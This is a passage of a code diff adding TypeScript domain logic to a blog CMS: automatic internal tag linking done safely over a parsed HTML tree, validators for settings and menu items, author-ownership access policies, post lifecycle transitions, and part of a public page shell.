+/** Out-of-range numeric knobs (Issue #641's own reasonable bounds, see the ceiling constants above). Empty when every configured value (or its default) is within range. */
+export function findBlogAutoInternalTagLinksConfigIssues(
+  env: NodeJS.ProcessEnv = process.env
+): BlogAutoInternalTagLinksConfigIssue[] {
+  const config = resolveBlogAutoInternalTagLinksConfig(env);
+  const issues: BlogAutoInternalTagLinksConfigIssue[] = [];
+
+  if (
+    config.maxPerPost < 1 ||
+    config.maxPerPost > BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST_CEILING
+  ) {
+    issues.push("max_per_post_out_of_range");
+  }
+
+  if (
+    config.maxPerTag < 1 ||
+    config.maxPerTag > BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_TAG_CEILING
+  ) {
+    issues.push("max_per_tag_out_of_range");
+  }
+
+  if (
+    config.minTermLength < 1 ||
+    config.minTermLength > BLOG_AUTO_INTERNAL_TAG_LINKS_MIN_TERM_LENGTH_CEILING
+  ) {
+    issues.push("min_term_length_out_of_range");
+  }
+
+  return issues;
+}

--- a/src/modules/blog-content/domain/internal-tag-linking-policy.ts
+++ b/src/modules/blog-content/domain/internal-tag-linking-policy.ts
@@ -1,0 +1,90 @@
+/**
+ * `PATCH /api/v1/blog/internal-tag-links/settings` validator (Issue #641).
+ * Shape-only — `disabledTagIds` existence/tenant-ownership/taxonomy-type
+ * checks require a database round trip and are done by the application
+ * layer (`internal-tag-link-settings-directory.ts`'s
+ * `countExistingTagTermIds`), same split `validateTermIds` in
+ * `blog-post-validation.ts` already uses for `termIds`.
+ */
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+const MAX_DISABLED_TAG_IDS = 500;
+
+export type UpdateInternalTagLinkingSettingsInput = {
+  enabled?: boolean;
+  caseInsensitive?: boolean;
+  disabledTagIds?: string[];
+};
+
+export type UpdateInternalTagLinkingSettingsValidationResult =
+  | { valid: true; value: UpdateInternalTagLinkingSettingsInput }
+  | { valid: false; errors: ValidationError[] };
+
+function validateDisabledTagIds(
+  value: unknown
+): { valid: true; value: string[] } | { valid: false } {
+  if (
+    !Array.isArray(value) ||
+    value.length > MAX_DISABLED_TAG_IDS ||
+    !value.every((item) => typeof item === "string" && UUID_PATTERN.test(item))
+  ) {
+    return { valid: false };
+  }
+
+  return { valid: true, value: [...new Set(value as string[])] };
+}
+
+export function validateUpdateInternalTagLinkingSettingsInput(
+  body: unknown
+): UpdateInternalTagLinkingSettingsValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+  const value: UpdateInternalTagLinkingSettingsInput = {};
+
+  if (record.enabled !== undefined) {
+    if (typeof record.enabled !== "boolean") {
+      errors.push({ field: "enabled", message: "enabled must be a boolean." });
+    } else {
+      value.enabled = record.enabled;
+    }
+  }
+
+  if (record.caseInsensitive !== undefined) {
+    if (typeof record.caseInsensitive !== "boolean") {
+      errors.push({
+        field: "caseInsensitive",
+        message: "caseInsensitive must be a boolean."
+      });
+    } else {
+      value.caseInsensitive = record.caseInsensitive;
+    }
+  }
+
+  if (record.disabledTagIds !== undefined) {
+    const result = validateDisabledTagIds(record.disabledTagIds);
+    if (!result.valid) {
+      errors.push({
+        field: "disabledTagIds",
+        message: `disabledTagIds must be an array of at most ${MAX_DISABLED_TAG_IDS} UUIDs.`
+      });
+    } else {
+      value.disabledTagIds = result.value;
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}
+
+export function isValidUuid(value: unknown): value is string {
+  return typeof value === "string" && UUID_PATTERN.test(value);
+}

--- a/src/modules/blog-content/domain/internal-tag-linking.ts
+++ b/src/modules/blog-content/domain/internal-tag-linking.ts
@@ -1,0 +1,354 @@
+/**
+ * Automatic internal tag linking (Issue #641, epic `news_portal` — the
+ * feature lives in `blog_content` since it must be generic for every
+ * `blog_content` consumer, not just full-online news portals; see
+ * `.claude/skills/awcms-news-portal/SKILL.md` §641).
+ *
+ * ## Security — why this is HTML-tree parsing, not string regex
+ *
+ * The issue's own Security notes are explicit: "Never use naive string
+ * replacement on raw HTML without parsing/sanitization — the render step
+ * must parse the HTML tree... and skip node types that are anchors/
+ * scripts/code/embeds, not just regex over the string." This module
+ * follows that literally: `applyInternalTagLinksToHtml` below uses Bun's
+ * built-in `HTMLRewriter` (a real streaming HTML parser, the same engine
+ * Cloudflare Workers expose under the identical name — Bun implements it
+ * natively, no external dependency, consistent with the Bun-only rule) to
+ * walk the actual element tree. A running `skipDepth` counter, incremented
+ * on entering any element in `DEFAULT_SKIP_TAGS` (+ headings when
+ * `excludeHeadings` is on) and decremented on that SAME element's own end
+ * tag (`el.onEndTag`), means text encountered while `skipDepth > 0` is
+ * left completely untouched — never even inspected — regardless of how
+ * deeply nested inside other skip tags it is. A regular expression is
+ * still used, but ONLY on plain text content the parser has already
+ * isolated as belonging to a safe, non-excluded text node — never on the
+ * raw HTML string, and never anywhere that could match across tag
+ * boundaries or reinterpret markup. This is the same "regex is fine
+ * *after* structural parsing has drawn the safe boundary, not as a
+ * substitute for it" principle `content-block-rendering.ts`'s whitelist
+ * renderer already applies to `content_json` blocks.
+ *
+ * `content_json` itself is already rendered through the existing
+ * whitelist renderer (`renderContentJsonToHtml`) before this module ever
+ * sees it — this module never opens a new raw-HTML escape hatch, it only
+ * post-processes renderer OUTPUT that is, by construction, already fully
+ * escaped text plus a small whitelist of safe tags (see that file's own
+ * header).
+ *
+ * ## Text handling — matching against already-escaped text, never decoding
+ *
+ * `HTMLRewriter`'s `text()` callback hands back the SOURCE-level text of a
+ * text node — i.e. already HTML-entity-encoded (`&` stays `&amp;`, etc.),
+ * not decoded. Rather than decoding it (which would require re-encoding
+ * correctly before re-emitting, a classic source of double-escaping/
+ * mis-escaping bugs — see the `mdEscape` lesson repeated across this
+ * repo's history), every candidate tag NAME is instead run through the
+ * exact same `escapeHtml` the renderer used, so matching happens entirely
+ * within the escaped-text domain. A tag literally named `Q&A` is matched
+ * against the source text's `Q&amp;A` — verified in this module's test
+ * suite. The un-decoded matched substring is reused verbatim as the
+ * anchor's inner text, so the emitted markup is always well-formed.
+ */
+import { escapeHtml } from "../../../lib/html/escape";
+
+export type InternalTagLinkCandidate = {
+  tagId: string;
+  /** Tag name/term to match — matched literally (optionally case-insensitively per policy), never a regex/glob from caller input. */
+  name: string;
+  /** Canonical tag archive URL, precomputed by the caller (tenant + basePath aware) — this module never constructs a URL itself. Always same-origin/internal by construction of every caller. */
+  url: string;
+};
+
+export type InternalTagLinkingPolicy = {
+  /** Final resolved enabled flag (env kill switch AND tenant override AND per-post override already applied by the caller) — `applyInternalTagLinksToHtml` trusts this as-is and does no further gating. */
+  enabled: boolean;
+  maxPerPost: number;
+  maxPerTag: number;
+  minTermLength: number;
+  linkFirstOccurrenceOnly: boolean;
+  excludeHeadings: boolean;
+  caseInsensitive: boolean;
+};
+
+export type InternalTagLinkMatch = {
+  tagId: string;
+  tagName: string;
+  url: string;
+  /** The exact (still HTML-escaped) substring that was linked — may differ in case from `tagName` when `caseInsensitive` is on. */
+  matchedText: string;
+};
+
+export type InternalTagLinkingResult = {
+  html: string;
+  matches: InternalTagLinkMatch[];
+};
+
+const EMPTY_RESULT_MATCHES: InternalTagLinkMatch[] = [];
+
+/**
+ * Element types whose text content must never receive an automatic link,
+ * regardless of `excludeHeadings` — existing links (never link inside a
+ * link), script/style/code/pre-formatted/embedded content, and figure
+ * captions (Issue #639/#542's `<figcaption>` — auto-linking a photo/video
+ * caption reads as noise, not an editorial choice). `iframe`/`object`/
+ * `embed`/`video`/`audio` have no meaningful inspectable text content
+ * anyway (this repo's own renderers never put text inside them) but are
+ * listed for defense-in-depth against a future block type that might.
+ */
+const DEFAULT_SKIP_TAGS: readonly string[] = [
+  "a",
+  "script",
+  "style",
+  "code",
+  "pre",
+  "kbd",
+  "samp",
+  "textarea",
+  "noscript",
+  "figcaption",
+  "iframe",
+  "object",
+  "embed",
+  "video",
+  "audio",
+  "template",
+  "math",
+  "svg"
+];
+
+const HEADING_TAGS: readonly string[] = ["h1", "h2", "h3", "h4", "h5", "h6"];
+
+function escapeRegExp(value: string): string {
+  return value.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+}
+
+/**
+ * The term as it would appear inside already-`escapeHtml`-processed text —
+ * matching happens in that domain (see file header), never against the
+ * raw/decoded term.
+ */
+function buildTermPattern(name: string): string {
+  return escapeRegExp(escapeHtml(name));
+}
+
+type PreparedCandidate = InternalTagLinkCandidate & { escapedName: string };
+
+/**
+ * Filters candidates below `minTermLength` (using the RAW name length —
+ * a short tag name is noisy/ambiguous regardless of how it happens to
+ * escape), sorts longest-escaped-pattern-first (so a combined alternation
+ * regex prefers "Jakarta Selatan" over "Jakarta" at the same text
+ * position — JS regex alternation picks the FIRST alternative that
+ * matches, not the longest overall, so ordering is what makes "longest
+ * match wins" true here), and de-duplicates by matching key (case rules
+ * per `policy.caseInsensitive`), keeping the first (i.e. longest, then
+ * alphabetically first) survivor on a collision.
+ */
+function prepareCandidates(
+  candidates: readonly InternalTagLinkCandidate[],
+  policy: InternalTagLinkingPolicy
+): PreparedCandidate[] {
+  const filtered = candidates.filter(
+    (candidate) => candidate.name.trim().length >= policy.minTermLength
+  );
+
+  const sorted = [...filtered].sort((a, b) => {
+    const lengthDiff = escapeHtml(b.name).length - escapeHtml(a.name).length;
+    return lengthDiff !== 0 ? lengthDiff : a.name.localeCompare(b.name);
+  });
+
+  const seenKeys = new Set<string>();
+  const prepared: PreparedCandidate[] = [];
+
+  for (const candidate of sorted) {
+    const escapedName = escapeHtml(candidate.name);
+    const key = policy.caseInsensitive
+      ? escapedName.toLowerCase()
+      : escapedName;
+
+    if (seenKeys.has(key)) {
+      continue;
+    }
+
+    seenKeys.add(key);
+    prepared.push({ ...candidate, escapedName });
+  }
+
+  return prepared;
+}
+
+export type InternalTagLinkEngine = {
+  /** Applies linking to one text-node buffer (already HTML-escaped source text), respecting running per-tag/per-post caps across the whole document. Returns the (possibly unchanged) HTML to emit in place of that text node. */
+  linkifyChunk(rawEscapedText: string): string;
+  getMatches(): InternalTagLinkMatch[];
+};
+
+/**
+ * Builds a stateful engine (per-tag + total link counters persist across
+ * calls, so callers processing a document's text nodes in order get
+ * correct "first N occurrences across the whole post" behavior) or `null`
+ * when there is nothing to match (no eligible candidates after filtering,
+ * or `policy.enabled` is `false`).
+ */
+export function createInternalTagLinkEngine(
+  candidates: readonly InternalTagLinkCandidate[],
+  policy: InternalTagLinkingPolicy
+): InternalTagLinkEngine | null {
+  if (!policy.enabled) {
+    return null;
+  }
+
+  const prepared = prepareCandidates(candidates, policy);
+
+  if (prepared.length === 0) {
+    return null;
+  }
+
+  const alternation = prepared
+    .map((candidate) => buildTermPattern(candidate.name))
+    .join("|");
+  const flags = `gu${policy.caseInsensitive ? "i" : ""}`;
+  const pattern = new RegExp(
+    `(?<![\\p{L}\\p{N}_])(?:${alternation})(?![\\p{L}\\p{N}_])`,
+    flags
+  );
+
+  const byKey = new Map<string, PreparedCandidate>();
+  for (const candidate of prepared) {
+    const key = policy.caseInsensitive
+      ? candidate.escapedName.toLowerCase()
+      : candidate.escapedName;
+    byKey.set(key, candidate);
+  }
+
+  const perTagCount = new Map<string, number>();
+  let totalCount = 0;
+  const matches: InternalTagLinkMatch[] = [];
+  const effectiveMaxPerTag = policy.linkFirstOccurrenceOnly
+    ? 1
+    : Math.max(1, policy.maxPerTag);
+
+  function linkifyChunk(rawEscapedText: string): string {
+    if (totalCount >= policy.maxPerPost) {
+      return rawEscapedText;
+    }
+
+    return rawEscapedText.replace(pattern, (matched) => {
+      if (totalCount >= policy.maxPerPost) {
+        return matched;
+      }
+
+      const key = policy.caseInsensitive ? matched.toLowerCase() : matched;
+      const candidate = byKey.get(key);
+
+      if (!candidate) {
+        return matched;
+      }
+
+      const currentTagCount = perTagCount.get(candidate.tagId) ?? 0;
+
+      if (currentTagCount >= effectiveMaxPerTag) {
+        return matched;
+      }
+
+      perTagCount.set(candidate.tagId, currentTagCount + 1);
+      totalCount += 1;
+      matches.push({
+        tagId: candidate.tagId,
+        tagName: candidate.name,
+        url: candidate.url,
+        matchedText: matched
+      });
+
+      // `matched` is already HTML-escaped source text (a substring of the
+      // already-escaped buffer) — safe to embed verbatim as the anchor's
+      // inner text. `candidate.url`/`candidate.tagId` are always
+      // caller-constructed (never client input) but are still escaped
+      // here as defense-in-depth.
+      return `<a href="${escapeHtml(candidate.url)}" class="auto-internal-link" data-tag-id="${escapeHtml(candidate.tagId)}" rel="tag">${matched}</a>`;
+    });
+  }
+
+  return {
+    linkifyChunk,
+    getMatches: () => matches
+  };
+}
+
+/**
+ * Renders `html` (already-safe output from `renderContentJsonToHtml` or
+ * equivalent) with automatic internal tag links applied, using Bun's
+ * `HTMLRewriter` to walk the real element tree — see file header for the
+ * full security reasoning. Never mutates the caller's original stored
+ * content; this is a pure render-time transform of a derived HTML string
+ * (Issue #641's own "Rendering policy": "Prefer non-destructive render-time
+ * linking... Do not mutate the original author-authored content body").
+ *
+ * Returns `{ html, matches: [] }` unchanged (no `HTMLRewriter` pass at all)
+ * when disabled or there are no eligible candidates — cheap no-op for the
+ * overwhelming majority of tenants/posts that never touch this feature.
+ */
+export async function applyInternalTagLinksToHtml(
+  html: string,
+  candidates: readonly InternalTagLinkCandidate[],
+  policy: InternalTagLinkingPolicy
+): Promise<InternalTagLinkingResult> {
+  const engine = createInternalTagLinkEngine(candidates, policy);
+
+  if (engine === null) {
+    return { html, matches: EMPTY_RESULT_MATCHES };
+  }
+
+  const skipTags = policy.excludeHeadings
+    ? [...DEFAULT_SKIP_TAGS, ...HEADING_TAGS]
+    : DEFAULT_SKIP_TAGS;
+
+  let skipDepth = 0;
+  const rewriter = new HTMLRewriter();
+
+  for (const tag of skipTags) {
+    rewriter.on(tag, {
+      element(element) {
+        skipDepth += 1;
+        element.onEndTag(() => {
+          skipDepth = Math.max(0, skipDepth - 1);
+        });
+      }
+    });
+  }
+
+  let buffer = "";
+
+  rewriter.on("*", {
+    text(chunk) {
+      if (skipDepth > 0) {
+        // Inside an excluded ancestor — leave the chunk exactly as
+        // streamed through, never inspected/matched.
+        return;
+      }
+
+      buffer += chunk.text;
+
+      if (chunk.lastInTextNode) {
+        const linked = engine.linkifyChunk(buffer);
+        buffer = "";
+        chunk.replace(linked, { html: true });
+      } else {
+        // Accumulate — the real text node may span multiple chunks;
+        // matching runs once on the full buffer at `lastInTextNode` so a
+        // term can never be missed/mismatched at a chunk boundary.
+        chunk.remove();
+      }
+    }
+  });
+
+  const response = rewriter.transform(
+    new Response(html, {
+      headers: { "content-type": "text/html; charset=utf-8" }
+    })
+  );
+
+  const outputHtml = await response.text();
+
+  return { html: outputHtml, matches: engine.getMatches() };
+}

--- a/src/modules/blog-content/domain/menu-policy.ts
+++ b/src/modules/blog-content/domain/menu-policy.ts
@@ -1,0 +1,224 @@
+import { isAbsoluteHttpUrl } from "./seo-validation";
+
+/**
+ * Menus (Issue #542 §Menus: "Support hierarchical navigation. Menu items
+ * can reference internal blog content or safe external URLs. Unsafe URLs
+ * must be rejected."). `linkType` gates which of `targetId`/`url` is
+ * meaningful — mirrors the schema's own `CHECK` constraint
+ * (`awcms_blog_menu_items_link_type_check`), this is the pre-insert
+ * application-layer check that returns a field-level error instead of a
+ * raw constraint violation, same convention `taxonomy-policy.ts` uses for
+ * tag/parent rules.
+ */
+export type MenuLinkType = "post" | "page" | "url";
+
+export const MENU_LINK_TYPES: readonly MenuLinkType[] = ["post", "page", "url"];
+
+export function isMenuLinkType(value: unknown): value is MenuLinkType {
+  return (
+    typeof value === "string" && (MENU_LINK_TYPES as string[]).includes(value)
+  );
+}
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+export type MenuItemInput = {
+  id: string;
+  parentItemId: string | null;
+  label: string;
+  linkType: MenuLinkType;
+  targetId: string | null;
+  url: string | null;
+  sortOrder: number;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+/**
+ * Validates one menu item. `id` is **client-supplied** (not DB-generated)
+ * and **required**: menu items are always fully replaced on every write
+ * (`menu-directory.ts`'s `syncMenuItems` deletes-then-reinserts the whole
+ * set), so a `parentItemId` referencing a row from a *previous* write would
+ * already be gone by insert time — self-supplied ids let `parentItemId`
+ * reference a sibling item in the *same* payload instead, resolved via a
+ * two-pass insert (parents before children, one level of nesting only,
+ * same depth limit `taxonomy-policy.ts` enforces for category/tag
+ * parents). `parentItemId`, when present, must reference a *different*
+ * item's `id` in the same batch (self-parent rejected, same rule
+ * `validateTermParent` enforces for taxonomy terms).
+ */
+export function validateMenuItemInput(
+  body: unknown,
+  index: number
+):
+  | { valid: true; value: MenuItemInput }
+  | { valid: false; errors: ValidationError[] } {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const prefix = `items[${index}]`;
+
+  if (typeof record.id !== "string" || !UUID_PATTERN.test(record.id)) {
+    errors.push({
+      field: `${prefix}.id`,
+      message: "id is required and must be a UUID."
+    });
+  }
+
+  if (!isNonEmptyString(record.label)) {
+    errors.push({ field: `${prefix}.label`, message: "label is required." });
+  }
+
+  if (!isMenuLinkType(record.linkType)) {
+    errors.push({
+      field: `${prefix}.linkType`,
+      message: "linkType must be one of post, page, url."
+    });
+  }
+
+  let targetId: string | null = null;
+  let url: string | null = null;
+
+  if (record.linkType === "post" || record.linkType === "page") {
+    if (
+      typeof record.targetId !== "string" ||
+      !UUID_PATTERN.test(record.targetId)
+    ) {
+      errors.push({
+        field: `${prefix}.targetId`,
+        message: "targetId is required and must be a UUID for post/page links."
+      });
+    } else {
+      targetId = record.targetId;
+    }
+  } else if (record.linkType === "url") {
+    if (typeof record.url !== "string" || !isAbsoluteHttpUrl(record.url)) {
+      errors.push({
+        field: `${prefix}.url`,
+        message:
+          "url is required and must be an absolute http(s) URL for url links."
+      });
+    } else {
+      url = record.url;
+    }
+  }
+
+  const parentItemId =
+    record.parentItemId === undefined || record.parentItemId === null
+      ? null
+      : record.parentItemId;
+
+  if (parentItemId !== null) {
+    if (typeof parentItemId !== "string" || !UUID_PATTERN.test(parentItemId)) {
+      errors.push({
+        field: `${prefix}.parentItemId`,
+        message: "parentItemId must be a UUID when provided."
+      });
+    } else if (typeof record.id === "string" && parentItemId === record.id) {
+      errors.push({
+        field: `${prefix}.parentItemId`,
+        message: "A menu item cannot be its own parent."
+      });
+    }
+  }
+
+  const sortOrder =
+    typeof record.sortOrder === "number" && Number.isInteger(record.sortOrder)
+      ? record.sortOrder
+      : index;
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      id: record.id as string,
+      parentItemId: parentItemId as string | null,
+      label: (record.label as string).trim(),
+      linkType: record.linkType as MenuLinkType,
+      targetId,
+      url,
+      sortOrder
+    }
+  };
+}
+
+export function validateMenuItemsInput(
+  body: unknown
+):
+  | { valid: true; value: MenuItemInput[] }
+  | { valid: false; errors: ValidationError[] } {
+  if (!Array.isArray(body)) {
+    return {
+      valid: false,
+      errors: [{ field: "items", message: "items must be an array." }]
+    };
+  }
+
+  const errors: ValidationError[] = [];
+  const items: MenuItemInput[] = [];
+
+  body.forEach((item, index) => {
+    const result = validateMenuItemInput(item, index);
+
+    if (!result.valid) {
+      errors.push(...result.errors);
+    } else {
+      items.push(result.value);
+    }
+  });
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  const idsSeen = new Set<string>();
+
+  for (const item of items) {
+    if (idsSeen.has(item.id)) {
+      errors.push({
+        field: "items",
+        message: `Duplicate item id "${item.id}".`
+      });
+    }
+
+    idsSeen.add(item.id);
+  }
+
+  const byId = new Map(items.map((item) => [item.id, item]));
+
+  for (const item of items) {
+    if (item.parentItemId === null) {
+      continue;
+    }
+
+    const parent = byId.get(item.parentItemId);
+
+    if (!parent) {
+      errors.push({
+        field: "items",
+        message: `Item "${item.id}" references parentItemId "${item.parentItemId}", which is not in this batch.`
+      });
+    } else if (parent.parentItemId !== null) {
+      errors.push({
+        field: "items",
+        message: `Item "${item.id}" is nested under a non-root item — only one level of menu nesting is supported.`
+      });
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value: items };
+}

--- a/src/modules/blog-content/domain/page-access-policy.ts
+++ b/src/modules/blog-content/domain/page-access-policy.ts
@@ -1,0 +1,38 @@
+import type {
+  AccessDecision,
+  TenantContext
+} from "../../identity-access/domain/access-control";
+import {
+  evaluateContentUpdateAccess,
+  type ContentOwnershipAttributes
+} from "./content-access-policy";
+
+const UPDATE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "pages",
+  action: "update" as const
+};
+
+export type PageOwnershipAttributes = ContentOwnershipAttributes;
+
+/**
+ * Same author-own-unpublished-content override as
+ * `post-access-policy.ts`'s `evaluatePostUpdateAccess`, fixed to
+ * `blog_content.pages.update` (doc issue #539: "must follow the same
+ * auth, tenant, RBAC/ABAC, ... patterns introduced in the blog post
+ * API"). See `content-access-policy.ts` for the shared implementation and
+ * `post-access-policy.ts` for the full ADR-0004 reasoning on why this
+ * lives in `blog_content`, not the shared `evaluateAccess` engine.
+ */
+export function evaluatePageUpdateAccess(
+  context: TenantContext,
+  grantedPermissionKeys: ReadonlySet<string>,
+  page: PageOwnershipAttributes
+): AccessDecision {
+  return evaluateContentUpdateAccess(
+    context,
+    grantedPermissionKeys,
+    UPDATE_GUARD,
+    page
+  );
+}

--- a/src/modules/blog-content/domain/page-type.ts
+++ b/src/modules/blog-content/domain/page-type.ts
@@ -1,0 +1,12 @@
+export type PageType = "standard" | "landing" | "legal" | "system";
+
+export const PAGE_TYPES: readonly PageType[] = [
+  "standard",
+  "landing",
+  "legal",
+  "system"
+];
+
+export function isPageType(value: unknown): value is PageType {
+  return typeof value === "string" && (PAGE_TYPES as string[]).includes(value);
+}

--- a/src/modules/blog-content/domain/post-access-policy.ts
+++ b/src/modules/blog-content/domain/post-access-policy.ts
@@ -1,0 +1,56 @@
+import type {
+  AccessDecision,
+  TenantContext
+} from "../../identity-access/domain/access-control";
+import {
+  evaluateContentUpdateAccess,
+  type ContentOwnershipAttributes
+} from "./content-access-policy";
+
+const UPDATE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "update" as const
+};
+
+export type PostOwnershipAttributes = ContentOwnershipAttributes;
+
+/**
+ * Issue #538 §ABAC Rules: "Author may edit own draft post if the post is
+ * not published" alongside "Editor/Admin with permission may edit all
+ * tenant posts." Both are expressed through the single
+ * `blog_content.posts.update` permission (doc issue #537's seed has no
+ * separate "update own" vs "update all" action) — a role holding that
+ * permission may update ANY tenant post (the "Editor/Admin" case); a
+ * tenant user who does NOT hold it may still update a post they authored,
+ * as long as it is not yet published (the "Author" case).
+ *
+ * This intentionally does not live in
+ * `identity-access/domain/access-control.ts`'s shared `evaluateAccess` —
+ * that engine is a generic, deny-biased evaluator reused across every
+ * module (ADR-0004 "default deny, deny overrides allow"); a resource-
+ * ownership ALLOW override is blog_content-specific business logic, not a
+ * cross-module primitive like the self-approval deny rule it already
+ * has. Composing on top of it here (call the generic decision first, only
+ * consult ownership when the sole reason for denial was a missing role
+ * permission) keeps the shared engine's default-deny guarantee intact
+ * while still supporting the per-module exception.
+ *
+ * Issue #539 factored the actual logic out to
+ * `content-access-policy.ts`'s `evaluateContentUpdateAccess` so
+ * `page-access-policy.ts` can reuse it for pages — this function is now a
+ * thin wrapper fixing the guard to `blog_content.posts.update`, kept for
+ * the resource-specific name callers already use.
+ */
+export function evaluatePostUpdateAccess(
+  context: TenantContext,
+  grantedPermissionKeys: ReadonlySet<string>,
+  post: PostOwnershipAttributes
+): AccessDecision {
+  return evaluateContentUpdateAccess(
+    context,
+    grantedPermissionKeys,
+    UPDATE_GUARD,
+    post
+  );
+}

--- a/src/modules/blog-content/domain/post-status.ts
+++ b/src/modules/blog-content/domain/post-status.ts
@@ -1,0 +1,82 @@
+export type BlogContentStatus =
+  "draft" | "review" | "scheduled" | "published" | "archived";
+
+export const BLOG_CONTENT_STATUSES: readonly BlogContentStatus[] = [
+  "draft",
+  "review",
+  "scheduled",
+  "published",
+  "archived"
+];
+
+export type BlogContentVisibility = "public" | "private" | "unlisted";
+
+export const BLOG_CONTENT_VISIBILITIES: readonly BlogContentVisibility[] = [
+  "public",
+  "private",
+  "unlisted"
+];
+
+export function isBlogContentStatus(
+  value: unknown
+): value is BlogContentStatus {
+  return (
+    typeof value === "string" &&
+    (BLOG_CONTENT_STATUSES as string[]).includes(value)
+  );
+}
+
+export function isBlogContentVisibility(
+  value: unknown
+): value is BlogContentVisibility {
+  return (
+    typeof value === "string" &&
+    (BLOG_CONTENT_VISIBILITIES as string[]).includes(value)
+  );
+}
+
+/**
+ * Allowed forward/back transitions between lifecycle states. Applied by the
+ * lifecycle-action endpoints landing in Issue #538 (publish/schedule/archive)
+ * and Issue #541 (scheduled publishing) — kept here as the single source of
+ * truth so both issues reuse the same rule instead of re-deriving it.
+ */
+const ALLOWED_STATUS_TRANSITIONS: Record<
+  BlogContentStatus,
+  readonly BlogContentStatus[]
+> = {
+  draft: ["review", "scheduled", "published", "archived"],
+  review: ["draft", "scheduled", "published", "archived"],
+  scheduled: ["draft", "published", "archived"],
+  published: ["archived", "draft"],
+  archived: ["draft"]
+};
+
+export function isValidStatusTransition(
+  from: BlogContentStatus,
+  to: BlogContentStatus
+): boolean {
+  if (from === to) {
+    return true;
+  }
+
+  return ALLOWED_STATUS_TRANSITIONS[from].includes(to);
+}
+
+/** Restore only makes sense for a currently soft-deleted post (Issue #538, same precondition `POST /api/v1/profiles/{id}/restore` already enforces). */
+export function canRestorePost(deletedAt: Date | null): boolean {
+  return deletedAt !== null;
+}
+
+/**
+ * Issue #538 §ABAC Rules: "Purge is forbidden for published content unless
+ * archived or soft-deleted first." A post already soft-deleted, or one whose
+ * lifecycle status is `archived`, may be purged; anything else (including
+ * `published`) may not.
+ */
+export function canPurgePost(
+  status: BlogContentStatus,
+  deletedAt: Date | null
+): boolean {
+  return deletedAt !== null || status === "archived";
+}

--- a/src/modules/blog-content/domain/public-page-rendering.ts
+++ b/src/modules/blog-content/domain/public-page-rendering.ts
@@ -1,0 +1,247 @@
+import { escapeHtml } from "../../../lib/html/escape";
+import { renderJsonLdScriptTag } from "./structured-data-rendering";
+import { resolveOgLocale } from "./seo-rendering";
+
+/** Structural shape only (title/slug/excerpt) so this domain-layer renderer has no dependency on the application layer's concrete row types — both `PublicBlogPostSummary` (listing/archive) and `BlogSearchResultItem` (search) satisfy this. */
+export type PublicPostLinkSummary = {
+  title: string;
+  slug: string;
+  excerpt: string | null;
+};
+
+/**
+ * Shared public-page HTML shell (Issue #540) — the `<head>`/SEO
+ * boilerplate every public blog page needs (title, meta description,
+ * canonical link, lang). Route-specific body content is built by each
+ * route itself (index/detail/category/tag/search bodies genuinely
+ * differ) and passed in already as safe HTML — this function only
+ * escapes the head-level text fields, it does not sanitize `bodyHtml`
+ * (that is `content-block-rendering.ts`'s job for post bodies, and plain
+ * template string interpolation with `escapeHtml` per field for list
+ * pages).
+ */
+export type PublicPageShellOptions = {
+  title: string;
+  description: string;
+  canonicalUrl: string | null;
+  bodyHtml: string;
+  locale: string;
+  /**
+   * Issue #636 — an already-resolved, verified R2 media object public URL
+   * (`seo-rendering.ts`'s `resolveOgImageUrl`), or `null` to omit
+   * `og:image`/`twitter:image` entirely. Never a raw/unvalidated URL.
+   */
+  ogImageUrl?: string | null;
+  /** Alt text for the `og:image`, from the same verified media object (`altText`) — omitted if there is no image or no alt text set. */
+  ogImageAlt?: string | null;
+  /**
+   * Issue #642 — tenant-specific site name (`PublicTenantResolution.tenantName`)
+   * rendered as `og:site_name`. Omitted (no tag) when not provided — every
+   * existing caller predates this option and stays behavior-identical.
+   */
+  siteName?: string | null;
+  /** Issue #649 — `og:type`. Only the post detail route passes `"article"` (enables `article:*` tags below); every other caller (list/category/tag/search) omits this and stays behavior-identical (no `og:type` tag at all, same as before this issue). */
+  ogType?: "website" | "article";
+  /** Issue #649 — MIME type of the resolved `ogImageUrl` object (`image/jpeg`, `image/png`, `image/webp`, or `image/avif`), from the same verified R2 media metadata. Renders `og:image:type` only when `ogImageUrl` is also present. */
+  ogImageMimeType?: string | null;
+  /** Issue #649 — width/height of the resolved `ogImageUrl` object, from the same verified R2 media metadata. Renders `og:image:width`/`og:image:height` only when `ogImageUrl` is also present. */
+  ogImageWidth?: number | null;
+  ogImageHeight?: number | null;
+  /** Issue #649 — ISO 8601 `article:published_time`/`article:modified_time`. Only rendered when `ogType === "article"`. */
+  articlePublishedTime?: string | null;
+  articleModifiedTime?: string | null;
+  /** Issue #649 — first category-taxonomy term name (`article:section`). Only rendered when `ogType === "article"`. */
+  articleSection?: string | null;
+  /** Issue #649 — every other assigned category/tag term name, each rendered as a separate `article:tag` meta tag (Open Graph's documented convention for multi-valued properties). Only rendered when `ogType === "article"`. */
+  articleTags?: readonly string[];
+  /**
+   * Issue #649 — `<meta name="robots">` content (`seo-rendering.ts`'s
+   * `resolveRobotsMetaContent`). Omitted (no tag, byte-for-byte pre-#649
+   * behavior) when not provided — only the post detail route passes this;
+   * list/category/tag/search pages are unaffected.
+   */
+  robotsContent?: string | null;
+  /**
